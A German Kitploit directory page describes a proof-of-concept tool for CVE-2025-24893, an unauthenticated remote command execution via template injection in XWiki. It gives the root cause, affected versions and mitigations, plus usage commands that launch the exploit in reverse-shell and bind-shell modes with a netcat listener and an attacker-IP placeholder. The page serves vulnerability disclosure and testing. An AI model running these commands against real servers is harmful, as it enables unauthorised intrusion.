Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24893-PoC — Proof of Concept für CVE-2025-24893, das eine nicht authentifizierte Remote-Befehlsausführung in XWiki durch unsichere serverseitige Template-Auswertung demonstriert. | Kitploit
Tools/GitHubGitHub/breakingrohit/cve-2025-24893-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungPayload-Entwicklung
GitHubbreakingrohit/cve-2025-24893-poc

CVE-2025-24893-PoC

Proof of Concept für CVE-2025-24893, das eine nicht authentifizierte Remote-Befehlsausführung in XWiki durch unsichere serverseitige Template-Auswertung demonstriert.

Repository anzeigen
22vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-24893 – XWiki Remote-Befehlsausführung (Proof of Concept)

Übersicht

Dieses Repository enthält einen kontrollierten Proof of Concept (PoC) für CVE-2025-24893, eine nicht authentifizierte Remote-Befehlsausführung (RCE)-Schwachstelle, die XWiki betrifft.

Die Schwachstelle ermöglicht es einem Angreifer, aufgrund unsicherer serverseitiger Template- und Skriptauswertung beliebige Betriebssystembefehle auf dem Server auszuführen.


Über XWiki

XWiki ist eine Open-Source-Enterprise-Wiki-Plattform, die häufig verwendet wird für:

  • Interne Dokumentation
  • Wissensdatenbanken
  • Team-Kollaborationsportale

Da XWiki häufig auf internetfähigen Servern eingesetzt wird, können Sicherheitslücken in der Anfrageverarbeitung und Skriptlogik eine hohe reale Auswirkung haben.


Schwachstellenzusammenfassung

  • CVE ID: CVE-2025-24893
  • Kategorie: Server-Side Template Injection, die zu Remote-Befehlsausführung führt
  • Angriffsvektor: HTTP-GET-Anfrage
  • Erforderliche Authentifizierung: Keine
  • Auswirkung: Beliebige Befehlsausführung mit Serverberechtigungen

Grundursache

Benutzergesteuerte Eingaben, die an den SolrSearch-Endpunkt übergeben wurden, wurden von der Groovy-Scripting-Engine unsachgemäß validiert und ausgewertet. Dies ermöglichte es, dass vom Angreifer bereitgestellte Eingaben als ausführbarer serverseitiger Code interpretiert wurden, was zur Befehlsausführung auf dem Hostsystem führte.


Betroffene Versionen

  • XWiki-Versionen bis einschließlich 15.10.10
  • In späteren Versionen behoben

Fähigkeiten des Proof of Concept

Dieser PoC demonstriert Folgendes:

  • Erkennungsmodus für Schwachstellen Bestätigt sicher, ob die Zielinstanz verwundbar ist, indem ein harmloser serverseitiger Ausdruck ausgeführt wird.

  • Remote-Befehlsausführung Demonstriert die beliebige Befehlsausführung auf dem Zielsystem.

  • Reverse-Shell-Ausführung Stellt eine ausgehende Shell-Verbindung vom Ziel zum Tester her.

  • Bind-Shell (optional) Öffnet eine lauschende Shell auf dem Zielhost (weniger zuverlässig als Reverse-Shells).


Verwendung

Schwachstellenprüfung

root@kitploit:~
python3 xwiki_cve_2025_24893.py http://target:8080 -m check

Reverse-Shell (empfohlen)

root@kitploit:~
nc -lvnp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m reverse -lh <attacker_ip> -lp 4444

Bind-Shell

root@kitploit:~
python3 xwiki_cve_2025_24893.py http://target:8080 -m bind -lp 4444

Ablauf des Angriffs auf hoher Ebene

  1. Eine präparierte Anfrage wird an den verwundbaren SolrSearch-Endpunkt gesendet
  2. Bösartige Template-Anweisungen werden über benutzergesteuerte Eingaben injiziert
  3. Die Eingabe wird von der Groovy-Engine als vertrauenswürdiger Code ausgewertet
  4. Beliebige Betriebssystembefehle werden auf dem Server ausgeführt

Anleitung zur Schadensbegrenzung

  • Aktualisieren Sie XWiki sofort auf eine gepatchte Version
  • Beschränken Sie den Zugriff auf interne Endpunkte, wo möglich
  • Begrenzen oder sandboxen Sie die serverseitige Skriptfunktionalität
  • Überwachen Sie Anwendungsprotokolle auf abnormales Template-Ausführungsverhalten

Haftungsausschluss

Dieses Projekt wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.

Jede unbefugte Nutzung dieses Codes gegen Systeme ohne ausdrückliche Genehmigung ist untersagt.


Credits

  • Ursprüngliche Schwachstellenforschung und PoC-Inspiration von Al Baradi Joy
  • Refaktorisiert und erweitert für Bildungs- und defensive Sicherheitsforschung

Zweck dieses Repositories

Dieses Repository wurde erstellt, um Folgendes zu demonstrieren:

  • Analyse realer Schwachstellen
  • Sichere und verantwortungsbewusste Entwicklung von Proofs of Concept
  • Verständnis von Server-Side Template Injection und RCE-Risiken
  • Defensives Bewusstsein und Überlegungen zur Schadensbegrenzung

Tool herunterladen